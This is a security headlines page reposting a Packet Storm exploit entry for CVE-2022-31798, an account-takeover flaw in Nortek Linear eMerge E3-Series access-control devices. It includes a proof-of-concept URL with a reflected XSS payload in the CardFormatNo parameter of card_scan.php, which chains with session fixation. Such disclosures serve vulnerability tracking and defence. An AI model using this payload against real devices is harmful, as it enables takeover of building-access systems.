Security
Headlines
HeadlinesLatestCVEs

Headline

Nortek Linear eMerge E3-Series Account Takeover

Nortek Linear eMerge E3-Series version 0.32-07p suffers from a vulnerability where session fixation tied with cross site scripting can allow for account takeover.

Packet Storm
#xss#vulnerability#php#auth
# Exploit Title: Nortek Linear eMerge E3-Series - Account Take Over# Exploit Author: Omar Hashim# Version: 0.32-07p# Vendor home page: https://www.nortekcontrol.com/access-control/# Vendor home page: https://linear-solutions.com/# Authentication Required: No# CVE: CVE-2022-31798# Description ====================There is local session fixation that chained with reflected cross-sitescripting leads to account take over of admin or less privileged users# Proof Of Concept: ====================http://<HOST:PORT>/card_scan.php?No=1337&ReaderNo=1337&CardFormatNo=<imgsrc=x onerror=alert(document.location)>

Related news

CVE-2022-31798: Nortek Linear eMerge E3-Series Account Takeover ≈ Packet Storm

Nortek Linear eMerge E3-Series 0.32-07p devices are vulnerable to /card_scan.php?CardFormatNo= XSS with session fixation (via PHPSESSID) when they are chained together. This would allow an attacker to take over an admin account or a user account.

Packet Storm: Latest News

ABB Cylon Aspect 3.07.02 user.properties Default Credentials